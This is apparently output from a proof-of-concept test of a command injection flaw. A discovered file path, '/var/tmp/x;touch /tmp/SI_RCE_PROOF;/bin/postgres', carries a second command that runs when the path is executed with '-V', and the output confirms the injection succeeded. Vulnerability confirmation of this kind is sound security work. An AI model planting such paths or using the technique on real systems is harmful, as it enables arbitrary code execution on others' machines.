Direct test: Simulating vulnerable code behavior...

Found paths: [
  '/usr/lib/postgresql/16/bin/postgres',
  '/var/tmp/x;touch /tmp/SI_RCE_PROOF;/bin/postgres'
]
Selected path (last after sort): /var/tmp/x;touch /tmp/SI_RCE_PROOF;/bin/postgres

!!! WARNING: Selected path contains semicolon - will cause command injection !!!

Executing vulnerable command: /var/tmp/x;touch /tmp/SI_RCE_PROOF;/bin/postgres -V

Command executed. Checking for proof file...

*** COMMAND INJECTION SUCCESSFUL - Proof file exists! ***
*** VULNERABILITY CONFIRMED ***